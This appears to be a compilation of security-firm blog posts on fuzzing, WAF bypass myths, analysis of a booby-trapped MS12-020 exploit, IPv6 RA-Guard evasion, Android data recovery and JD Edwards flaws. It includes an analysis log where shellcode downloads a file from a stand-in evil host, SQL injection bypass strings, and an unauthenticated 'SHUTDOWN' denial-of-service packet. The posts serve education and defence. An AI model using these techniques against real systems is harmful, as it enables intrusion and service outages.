Hi @all,
today im releasing a new version of our famous fuzzing framework, dizzy. The version counts 0.6 by now and youll get some brand new features!
see the CHANGELOG:
– ssl support
– server side fuzzing mode
– command output
– new dizz funktions: lambda_length, csum, lambda_csum, lambda2_csum
– recursive mutation mode
– new dizz objects: fill
– new interaction objects: null_dizz
– reconnect option
– additional fuzzing values
find the sources here (90397f9ec11c8ec3db7f14cb4d38dd39e30f9791)
SQL injection attacks have been well known for a long time and many people think that developers should have fixed these issues years ago, but doing web application pentests almost all the time, we have a slightly different view. Many SQL injection problems potentially remain undetecteddue to a lack of proper test methodology, so we would like to share our approach and experience and help others in identifying these issues.
As I mentioned the Telco Sec Day in the last post… for those who missed Flo’s announcement: in the interim all slides of the Telco Sec Day are available online here.
Obviously, given I initiated the event, I’m biased 😉 but to me it provided great insight from both the talks and the networking with other guys from the telco security field, and it did actually what it was meant for: fostering the exchange between different players in that space, for the sake of sustainably improving its’ overall security posture.
A number of participants suggested performing it again which we hence plan to do, at next year’s Troopers (probably happening in the week 03/12-03/16 [calendar week 11]).
As in 2011 we really liked the conference; there was a number of interesting talks and we met quite some fellows from the IPv6 security space. Btw: we plan to organize a dedicated IPv6 security summit in late 2012 (probably on 6th and 7th of November) in Heidelberg, similar to the Telco Sec Day at Troopers. We’ll annouce details as for this one in some weeks.
In march 2012 Microsoft announced a critical vulnerability (Microsoft Security Bulletin MS12-020) related to RDP that affects all windows operating systems and allows remote code execution. A lot of security professionals are expecting almost the same impact as with MS08-067 (the conficker vulnerability) and that it will be only a matter of time, until we will spot reliable exploits in the wild. Only a few days later an exploit, working for all unpatched windows versions was released, so it seems that they were right ;-), but of course no one will run an exploit without investigating the code. So lets have a look into the exploit Code.
First we take a look into the Microsoft advisory to get some information about the vulnerability itself:
The vulnerability requires some “specifically crafted RDP packets” to be sent to the vulnerable system to trigger the problem. We should spot this trigger in the exploit:
OK, the trigger is there and we also see some shellcode, that will open a bindshell on TCP port 8888. The next step is to figure out, what the exploit is doing with this code:
The exploit code converts a lot of opcodes to the big endian format, that looks reasonable because the exploit claims to work on all affected windows versions. The last step is to verifiy, how all the stuff is sent to the vulnerable system:
We see that target IP address and the RDP port are assigned and collected from the command line, the RDP packet is generated and the “specifically crafted RDP packets” are sent to the target.Finally the shellcode is sent and we are ready to connect to a remote shell that listens on TCP port 8888. Game over ;-).
We have verified the exploit, so it’s time now to run it against some unpatched test system and see, if we can compromise all these unpatched boxes out there …
…JUST KIDDING, never ever do that and I’m not talking about the legal issues this time ;-). It is a quite common mistake by unexperienced testers to work in this way. The exploit code was gathered from an untrusted source, so it needs detailed investigations before you run it, not just a short walk-through. You have to ensure that you understand every line of code completely to avoid being targeted by yourself, even the shellcode and the trigger of the rdp example. So let’s digg a little bit deeper into this.
First we have to extract the shellcode and trigger (the opcodes) from the exploit for further analysis. I prefer a special editor for this task that has all needed functionality (and much more 😉 ) built-in. It’s a commercial tool called “010 Editor” that can be obtained here and is available as a windows and MAC OS X version.
Step 1
Copy just the trigger opcodes into a dedicated text file, don’t forget to remove the double quotes. The text files should look almost like this:
and shellcode:
Step 2
Use the editors replace function to replace “\x” with “0x” for the trigger and shellcode text files. Take the shellcode as an example, how the opcodes should look now:
Step 3
Mark all this hex data and copy it to the clipboard.
Step 4
Choose “File-New-New Hex File” from the “010 Editors” menu to create an empty hex file.
Step 5
Now choose “Edit-Paste From-Paste from Hex Text” to paste the data as hex data into the new hex file.
Step 6
Save both files (trigger and shellcode) as trigger.sc and shellcode.sc
Now we would be ready to analyze the opcodes with some toolset, but I assume that all of you already spotted some very interesting stuff within the shellcode part ;-):
Yes, it looks like the shellcode doesn’t open a bindshell, it just erases parts of your hard drive on windows and your complete root partition on unix.
This is really GAME OVER, if you would have run the exploit without a detailed analysis on a productive system. This code is referenced with the following code:
But in case that the shellcode wouldn’t have been so easily readable, there are more options for an easy analysis. Based on the shellcode emulation library libemu there are some tools available to find out what the shellcode is doing without reverse engineering it. SCDBG is one that runs on all unix based systems and also on windows, you can grab it here.
Let us see how SCDBG works with a short example shellcode: scdbg -f UrlDownloadToFile.sc
Loaded 150 bytes from file UrlDownloadToFile.sc
Initilization Complete..
Max Steps: 2000000
Using base offset: 0x401000
40107aGetTempPath(len=104, buf=12fce4)
4010b2URLDownloadToFile(http://blahblah.com/evil.exe0, C:\%TEMP%\dEbW.exe)
Stepcount 293883
So the example shellcode downloads a malicious file and executes it, let’s have a look at our shellocde now: scdbg -f shellcode.sc
Loaded 10d bytes from file shellcode.sc
Initilization Complete..
Max Steps: 2000000
Using base offset: 0x401000
401002opcode 69 not supported
Stepcount 2
SCDBG fails to analyze the shellcode (for obvious reasons as we already know), so you can take this result as a good hint, that some stuff is hidden in the code and that you better shouldn’t run it.
Lessons learned
So finally, let’s summarize some lessons that every serious penetration tester should be aware of:
1. Never run any untrusted code (especially exploits) without a detailed analysis.
2. Ensure that you understand every line of code and this also includes the shellcode.
3. Before using untrusted code in a real pentest, verify it in a test environment (virtual machines are a good choice for that).
4. When using exploits on customer systems be aware that you’re running it on one of the assets of your customer! Don’t do that without your customers permission!
5. Your customer trusts your professional knowledge, so it’s your responsibility to avoid damaging any of your customers systems by mistake.
Some days ago a security advisory related to web application firewalls (WAFs) was published on Full Disclosure. Wendel Guglielmetti Henrique found another bug in the IBM Web Application Firewall which can be used to circumvent the WAF and execute typical web application attacks like SQL injection (click here for details). Wendel talked already (look here) at the Troopers Conference in 2009 about the different techniques to identify and bypass WAFs, so this kind of bypass methods are not quite new.
Nevertheless doing a lot of web application assessments and talking about countermeasures to protect web applications there’s a TOP 1 question I have to answer almost every time: “Wouldn’t it be helpful to install a WAF in front of our web application to protect them from attacks?”. My typical answer is “NO” because it’s better to spent the resources for addressing the problems in the code itself. So I will take this opportunity to write some rants about sense and nonsense of WAFs ;-). Let’s start with some – from our humble position – widespread myths:
1. WAFs will protect a web application from all web attacks .
2. WAFs are transparent and can’t be detected .
3. After installation of a WAF our web application is secure, no further “To Dos” .
4. WAFs are smart, so they can be used with any web application, no matter how complex it is .
5. Vulnerabilities in web applications can’t be fixed in time, only a WAF can help to reduce the attack surface.
And now let us dig a little bit deeper into these myths ;-).
1. WAFs will protect a web application from all web attacks
There are different attack detection models used by common WAFs like signature based detection, behavior based detection or a whitelist approach. These detection models are also known by attackers, so it’s not too hard to construct an attack that will pass the detection engines.
Just a simple example for signatures ;-): Studying sql injection attacks we can learn from all the examples that we can manipulate “WHERE clauses” with attacks like “or 1=1”. This is a typical signature for the detection engine of WAFs, but what about using “or 9=9” or even smarter 😉 “or 14<15”? This might sound ridiculous for most of you, but this already worked at least against one WAF 😉 and there are much more leet attacks to circumvent WAFs (sorry that we don’t disclose any vendor names, but this post is about WAFs in general).
Another point to mention are the different types of attacks against web applications, it’s not all about SQL injection and Cross-Site Scripting attacks, there also logic flaws that can be attacked or the typical privilege escalation problem “can user A access data of user B?”. A WAF can’t protect against these attacks, it a WAF can raise the bar for attackers under some circumstances, but it can’t protect a web application from skilled attackers.
2. WAFs are transparent and can’t be detected
In 2009, initially at Troopers ;-), Wendel and Sandro Gauci published a tool called wafw00f and described their approach to fingerprint WAFs in different talks at security conferences. This already proves that this myth is not true. Furthermore there will be another tool release from ERNW soon, so stay tuned, it will be available for download shortly ;-).
3. After installation of a WAF my web application is secure, no further “To Dos”
WAFs require a lot of operational effort just because web applications offer more and more functionality and the main purpose of a web application is to support the organization’s business. WAF administrators have to ensure that the WAF doesn’t block any legitimate traffic. It’s almost the same as with Intrusion Detection and Prevention Systems, they require a lot of fine tuning to detect important attacks and ensure functionality in parallel. History proves that this didn’t (and still doesn’t) work for most IDS/IPS implementations, why should it work for WAFs ;-)?
4. WAFs are smart, so they can be used with any web application, no matter how complex it is
Today’s web applications are often quite complex, they use DOM based communication, web services with encryption and very often they create a lot of dynamic content. A WAF can’t use a whitelist approach or the behavior based detection model with these complex web applications because the content changes dynamically. This reduces the options to the signature based detection model which is not as effective as many people believe (see myth No. 1).
5. Vulnerabilities in web applications can’t be fixed in time, only a WAF can help to reduce the attack surface
This is one of the most common sales arguments, because it contains a lot of reasonable arguments, but what these sales guys don’t tell is the fact, that a WAF won’t solve your problem either ;-).
Talking about risk analysis the ERNW way we have 3 contributing factors: probability, vulnerability and impact. A WAF won’t have any influance on the impact, because if the vulnerability gets exploited there’s still the same impact. Looking at probabilities with the risk analysis view, you have to take care that you don’t consider existing controls (like WAFs 😉 ) because we’re talking about the probability that someone tries to attack your web application and I think that’s pretty clear that the installation of a WAF won’t change that ;-). So there’s only the vulnerability factor left that you can change with the implementation of controls.
But me let me ask one question using the picture of the Fukushima incident: What is the better solution to protect nuclear plants from tsunamis? 1. Building a high wall around it to protect it from the water? 2. Build the nuclear plant at a place where tsunamis can’t occur?
I think the answer is obvious and it’s the same with web application vulnerabilities, if you fix them there’s no need for a WAF. If you start using a Security Development Lifecycle (SDL) you can reach this goal with reasonable effort ;-), so it’s not a matter of costs.
Clarifying these myths of web application firewalls, I think the conclusions are clear. Spend your resources for fixing the vulnerabilities in your web applications instead of buying another appliance that needs operational effort, only slightly reducing the vulnerability instead of eliminating it and also costing more money. We have quite a lot of experience supporting our customers with a SDL and from this experience we can say, that it works effectively and can be implemented more easily than many people think.
You are still not convinced ;-)? In short we will publish an ERNW Newsletter (our newsletter archive can be found here) describing techniques to detect und circumvent WAFs and also a new tool called TSAKWAF (The Swiss Army Knife for Web Application Firewalls) which implements these techniques for practical use. Maybe this will change your mind ;-).
TROOPERS12 came to an end last week on Friday; needless to say it was an awesome event. 😉
The first two days offered workshops on various topics. On Monday Enno, Marc “Van Hauser” Heuse and I gave a one day workshop on “Advanced IPv6 Security”. I think attendees as well as trainers had a real good time during and after the workshop fiddling around with IPv6. Especially Marc had quite some fun as he discovered that we provided “global” IPv6 Connectivity for the conference network, and according to one of his tweets, TROOPERS12 was the first security conference he visited, offering this kind of connectivity.
So back to the topic
Our last posts on IPv6 Security go back to the first half of 2011. If you haven’t read them already, now it’s a good time to do so. You can find them here, here, here and here.
In the last post of the series Enno discussed how RA-Guard can be circumvented with clever use of extension headers. As a short reminder, the packet dump looks like this.
The Information of the upper-layer protocol is only present in the second fragment, so RA Guard does not kick in.
As we found out on the Heise IPv6 Kongress last year, this issue can be mitigated with the following parameter in an IPv6 ACL.
deny ipv6 any any undetermined-transport
As a reminder, this parameter drops all IPv6 packets where the upper-layer protocol information cannot be determined.
After the workshop was officially over, Marc and I played a little bit with this ACL Parameter to see if it is working as intended. So I configured the following IPv6 ACL on our beautiful Cisco 4948E:
4948E(config)#ipv6 access-list IPv6
4948E(config-ipv6-acl)#deny ipv6 any any undetermined-transport
4948E(config-ipv6-acl)#permit ipv6 any any
4948E(config)#interface g1/19
4948E(config-if)#ipv6 traffic-filter IPv6 in
We started the attack again with the following parameter:
Apparently nothing happened with my (IPv6 enabled) laptop (which is a good thing ;))
The corresponding packet dump looked quite unspectacular:
Only the STP packets could be seen, and the flooded router advertisements were dropped by the Switch.
So could this parameter solve the issue with the whole RA mess?
Unfortunately the answer is no. The ACL parameter does mitigate the issue with the fragmented router advertisement. However, the ACL parameter can be circumvented by using overlapping fragments. Unfortunately we couldn’t test this scenario because this wasn’t yet implemented in the THC Tool Suite, but this is just a matter of time…
The IPv6 Packet basically looks like this:
Fragment 1:
IPv6 Header
Fragmentation Header
Destination Header (8 bytes)
ICMPv6 with Echo Request
Fragment 2:
IPv6 Header
Fragmentation Header with offset == 1 (equals position of 8th byte ==
start of Echo Request in first fragment)
ICMPv6 with RA
In this case it depends on the operating system whether or not the packet is discarded when overlapping fragments are detected. RFC 5722 is very specific on how these should be handled:
“When reassembling an IPv6 datagram, if one or more its
constituent fragments is determined to be an overlapping
fragment,the entire datagram (and any constituent fragments,
including those not yet received) MUST be silently discarded.”
So it is up to the operating system to implement this behavior. We’ll see how things work out 😉
If you’re interested in more IPv6 issues, or simply wanna chat about this topic, meet Enno and me again at the Heise IPv6 Kongress this year in Frankfurt, where we will give a talk on IPv6 as well.
Lately there have been some rumors on the full-disclosure mailing list referring to a blogpost of Hatforce about a new method to bypass the PIN/password lock on Android Gingerbread phones.
The approach was to boot into the Recovery Mode and execute a reset to factory state. The ideal result should be a reliable wipe of the /data partition. However, the author managed to recover data after the wiping process. This has been stated as a method on extracting sensitive date without knowing the actual pin or passcode.
This approach was tested on a Nexus S smartphone with Android 2.3.6 assuming the problem could be present on other devices too.
As of our experience this actually affects all Android devices without device encryption. Meanwhile we had more than ten different Android 2.3.x devices from four different vendors. All of them need less than a minute for a factory reset. An actual example is the HTC Desire HD with a 1,1GB /data partition excluding the /cache partition. The factory reset procedure took about 40 seconds, which can hold as an advice to question if this time is actually sufficient to wipe the whole storage. Finally we have been able to recover data after factory-reset devices as part of previous studies.
Besides mentioning that the source code indicates Android devices runnig Android Honeycomb and later effectively wipe data. After looking up in the source code of Android Ice Cream Sandwich we found that the FileWriter class is used for the wipe of the /cache and /data partition. So no indication on overwriting the data here. We assume, that by mentioning the issue as resolved, he was referring to Android Honeycomb device encryption being use, which indeed resolves this issue. This feature has been announced as a new feature anyway.
The fact about getting the data without knowing the PIN however does not really fit the case. From our opinion that’s not a new thought anyway. As long as the storage is not encrypted there always ways to access and read it. My favorite way is to flash the recovery mode with a custom one, e.g. ClockWorkMod By this means it’s possible to run Android Debugging Bridge, su and dd binaries which in return can be used to connect to the device via USB cable and create a raw copy of the storage. Additionally it becomes available to follow the loudness principle and acquire data on a forensic level.
However there is one important aspect mentioned in the blogpost, which we fully agree with: lost device means lost data!
As there has been some public demand for that, here we go with the final agenda for the Troopers “TelcoSecDay“. The workshop is meant to provide a platform for research exchange between operators, vendors and researchers. The slides of the talks will potentially be made available as well.
8:30: Opening Remarks & Introduction
9:00: Sebastian Schrittwieser (SBA Research): Guess Who’s Texting You? Evaluating the Security of Smartphone Messaging Applications.
10:00: Peter Schneider (NSN): How to secure an LTE-Network: Just applying the 3GPP security standards and that’s it?
10:45: Break
11:00: Kevin Redon (T-Labs): Weaponizing Femtocells – The Effect of Rogue Devices on Mobile Telecommunications
11:45: Christian Kagerhuber (Group IT Security, Deutsche Telekom AG): Security Compliance Audit Automation (SCA, TeleManagementForum TMF528)
12:30: Lunch
13:45: Philipp Langlois (P1 Security): Assault on the GRX (GPRS Roaming eXchange) from the Telecom Core Network perspective, from 2.5G to LTE Advanced.
15:00: Break
15:15: Harald Welte (sysmocom): Structural deficits in telecom security
16:30: Closing Remarks
17:00: End of workshop
19:00: Joint dinner (hosted by ERNW) in Heidelberg Altstadt for those interested and/or staying for the main conference
Synopses & Bios
Sebastian Schrittwieser: Guess Who’s Texting You? Evaluating the Security of Smartphone Messaging Applications.
Synopsis: Recently, a new generation of Internet-based messaging applications for smartphones was introduced. While user numbers are estimated in the millions, little attention has so far been paid to the security of these applications. In this talk, we present our experimental results, which revealed major security flaws, allowing attackers to hijack accounts, spoof sender-IDs, and enumerate subscribers.
Bio: Sebastian Schrittwieser is a PhD candidate at the Vienna University of Technology and a researcher at SBA Research. His research interests include, among others, digital forensics, software protection, code obfuscation, and digital fingerprinting. Sebastian received a Dipl.-Ing. (equivalent to MSc) degree in Business Informatics with focus on IT security from the Vienna University of Technology in 2010.
Peter Schneider: How to secure an LTE-Network: Just applying the 3GPP security standards and that’s it?
Synopsis: This talk briefly introduces the security architecture of an LTE mobile network as specified by 3GPP and shows which threats it mitigates and which not. It discusses additional, not-standardized security measures and how they can contribute to making mobile networks as secure as they need to be.
Bio: After many years of research, prototyping and systems engineering in the area of communication technologies, Peter works currently as a senior expert for mobile network security in the Security Technologies Team at Nokia Siemens Networks Research. He is author of various mobile network related security concepts. He is also active in the 3GPP security standardization and in several security research projects.
Kevin Redon: Weaponizing Femtocells – The Effect of Rogue Devices on Mobile Telecommunications
Synopsis: Mobile phones and carriers trust the traditional base stations which serve as the interface between the mobile devices and the fixed-line communication network. Femtocells, miniature cellular base stations installed in homes and businesses, are equally trusted yet are placed in possibly untrustworthy hands. By making several modifications to a commercially available femtocell, we evaluate the impact of attacks originating from a compromised device. We show that such a rogue device can violate all the important aspects of security for mobile subscribers, including tracking phones, intercepting communication and even modifying and impersonating traffic. The specification also enables femtocells to directly communicate with other femtocells over a VPN and the carrier we examined had no filtering on such communication, enabling a single rogue femtocell to directly communicate with (and thus potentially attack) all other femtocells within the carrier’s network.
Bio: Kevin Redon does his master of computing at the Technische Universitaet Berlin. He also works for “Security in Telecommunication” (SecT), a research group of the university.
Christian Kagerhuber: Security Compliance Audit Automation (SCA, TeleManagementForum TMF528)
Synopsis: Today, Service Providers are in need of comprehensive information relevant to effective security management. Service Providers have to evaluate and verify the compliance of their infrastructure and services to corporate security directives and legal guidelines. This includes being able to retrace OSS Operators’ behavior on OSS systems via standardized log messages. But to answer all necessary security compliance questions, log data alone appears not to be sufficient.
Service Providers need configuration data and telemetry data centralized at hand without manual, time-consuming OSS Operator activity. Even interactive polling of their devices is not sufficient because Service Providers must track down changes in the environment and the effective date/period. The talk is about what to solve this problem.
Bio: Christian is a Senior Security Expert at Deutsche Telekom (DT), responsible for the security of DT’s NGOSS system (called NGSSM) and BNG/SCRAT project. He build up T-Online’s Identity Management and CERT and is the author of various Deutsche Telekom security standards, e.g. on platform virtualisation and SSH.
Philippe Langlois: Assault on the GRX (GPRS Roaming eXchange) from the Telecom Core Network perspective, from 2.5G to LTE Advanced.
Synopsis: GRX is the global private network where Telecom network operators exchange GPRS roaming traffic of their users. It’s also used for all M2M networks where roaming is used, and that is the case from some company’s truck fleet management system down to intelligence GPS location spybug tracking system. GPRS has been there from 2.5G GSM networks to the upcoming LTE Advanced networks, and is now quite widespread technology, along with its attacks. GRX has had a structuring role in the global telecom world at a time where IP dominance was being to be acknowledged. Now it has expanded to a lightweight structure using both IP technologies and ITU-originated protocols.
We’ll see how this infrastructure is protected and can be attacked, and we’ll discover the issues with the specific telco equipment inside GRX, namely GGSN and SGSN but also now PDN Gateways in LTE and LTE Advanced “Evolved Packet Core”. We will see its implication with GTP protocol, DNS infrastructure, AAA servers and core network technologies such as MPLS, IPsec VPNs and their associated routing protocols. These network elements were rarely evaluated for security, and during our engagements with vulnerability analysis, we’ve seen several typical vulnerabilities that we will be showed in this speech. We will demo some of the attacks on a simulated “PS Domain” network, that it the IP part of the Telecom Core Network that transports customers’ traffic, and investigate its relationships with legacy SS7, SIGTRAN IP backbones, M2M private corporate VPNs and telecom billing systems. We will also seem how automation enable us to succeed at attacks which are hard to perform and will show how a “sentinel” attack was able to compromise a telecom Core Network during one penetration test.
Bio: Philippe Langlois is a leading security researcher and expert in the domain of telecom and network security. He founded internationally recognized security companies (Qualys, WaveSecurity, INTRINsec, P1 Security) as well as led technical, development and research teams (Solsoft, TSTF). He founded Qualys and led the world-leading vulnerability assessment service. He founded a pioneering network security company Intrinsec in 1995 in France. His founded his first business, Worldnet, France’s first public Internet service provider, in 1993. Philippe was also lead designer for Payline, one of the first e-commerce payment gateways. He has written and translated security books, including some of the earliest references in the field of computer security, and has been giving speeches on network security since 1995 (Interop, BlackHat, HITB, Hack.lu). Previously professor at Ecole de Guerre Economique and various universities in France (Amiens, Marne La Vallée) and internationally (FUSR-U, EERCI). He is a FUSR-U (Free University for Security Research) collaborator and founding member. Philippe is providing industry associations (GSM Association Security Group, several national organizations) and governmental officials with Critical Infrastructure advisory conferences in Telecom and Network security. Now Philippe is providing with P1 Security the first Core Network Telecom Signaling security scanner & auditor which help telecom companies, operator and government analyze where and how their critical telecom network infrastructure can be attacked. He can be reached through his website at: http://www.p1security.com
He has presented previously at these security/hacking conferences: Hack.lu, Hack in the Box (HITB), Blackhat, Hackito Ergo Sum (paris, France), SOURCE, Chaos Communication Congress (Berlin, Germany), ekoparty (bueos aires, argentina), H2HC (sao paulo, brazil), SYSCAN (Hong Kong; Thailand), Bellua (Jakarta, Indonesia), INT (Mauritius), Interop… (some events listed there http://www.p1sec.com/corp/about/events/ )
Harald Welte: Structural deficits in telecom security
Synopsis: Especially in recent years, numerous practical attacks and tools have been developed and released. The attack patterns and methods from the dynamic Internet world have finally caught up with the dinosaur of the Telecom world. So far, the industry has failed to demonstrate sufficient interest in developing proper responses. The changes so far have been superficial. Are they a sufficient response for what is to come? Has the telecom industry realized the true implications of having left the “walled garden”? The talk will leave the field of actual attacks behind in order to talk about what at least the author perceives as structural deficits in terms of IT security at operators and equipment vendors.
Bio: Harald Welte is communications security consultalt for more than a decade. He was co-author of tne netfilter/iptables packet filter in the Linux kernel and has since then been involved in a variety of Free Software based implementations of protocol stacks for RFID, GSM, GPRS, and TETRA. His main interest is to look at security of communication systems beyond the IP-centric mainstream. Besides his consulting work, he is the general manager of Sysmocom GmbH, providing custom tailored communications solutions to customers world-wide.
Have a great Sunday everybody, see you soon at Troopers 😉
This is a guest post by the SAP security expert Juan Pablo Perez-Etchegoyen, CTO of Onapsis. Enjoy reading:
At Onapsis we are continuously researching in the ERP security field to identify the risks that ERP systems and business-critical applications are exposed to. This way we help customers and vendors to increase their security posture and mitigate threats that may be affecting their most important platform: the one that stores and manages their business’ crown jewels.
We have been talking about SAP security in many conferences over the last years, not only showing how to detect insecure settings and vulnerabilities but also explaining how to mitigate and solve them. However, something that is still less known is that since 2009 we have been also doing research over Oracle’s ERP systems (JD Edwards, Siebel, PeopleSoft, E-Business Suite) and reporting vulnerabilities to the vendor. In this post, I’m going to discuss some of the vulnerabilities that we reported, Oracle fixed and released patches in the latest CPU (Critical Patch Update) of January 2012. In this CPU, 8 vulnerabilities reported by Onapsis affecting JD Edwards were fixed.
What’s really important about these vulnerabilities is that most of them are highly critical, enabling a remote unauthenticated attacker to fully compromise the ERP server just having network access to it. I’m going to analyze some these vulnerabilities to shed some light on the real status of JD Edwards’ security. Most of these vulnerabilities are exploitable through the JDENET service, which is a proprietary protocol used by JDE for connecting the different servers.
Sending a specific packet in the JDENET message, an attacker can basically instruct the server to write an arbitrary content in an arbitrary location, leading to an arbitrary file write condition.
An attacker can read any file, by connecting to the JDENET service.
ONAPSIS-2012-007: Oracle JD Edwards SawKernel SET_INI Configuration Modification Modifications to the server configuration (JDE.INI) can be performed remotely and without authentication. Several attacks are possible abusing this vulnerability.
ONAPSIS-2012-006: Oracle JD Edwards JDENET Large Packets Denial of Service
If an attacker sends packets larger than a specific size, then the server’s CPU start processing at 100% of its capacity. Game over.
As a “bonus” to this guest blog post, I would like to analyze a vulnerability related to the set of security advisories we released back on April 2011 (many of them also critical). This vulnerability is the ONAPSIS-2011-07.
The exploitation of this weakness is very straight-forward, as the only thing an attacker needs to do is to send a packet to the JDENET command service (typically UDP port 6015) with the message “SHUTDOWN”, and all JD Edwards services are powered off! Business impact? None of the hundreds/thousands of the company’s employees that need the ERP system to do their every-day work will be able to do their job.
Some people still talk about ERP security as a synonym of Segregation of Duties controls. This is just an example of a high-impact Denial of Service attack that can be performed against the technical components of these systems. No user or password. No roles or authorizations.
Even worse, as UDP connections are stateless, it’s trivial for the attacker to forge its source and exploit the vulnerability potentially bypassing firewall filters.
Hope you enjoyed our post and I’d like to thank Enno, Florian and the great ERNW team for their kind invitation.
You can get more information about our work at www.onapsis.com
BTW: Meet Mariano Nuñez Di Croce, CEO of Onapsis at TROOPERS12 in about ten days! He will give a talk and also host a dedicated workshop on SAP security.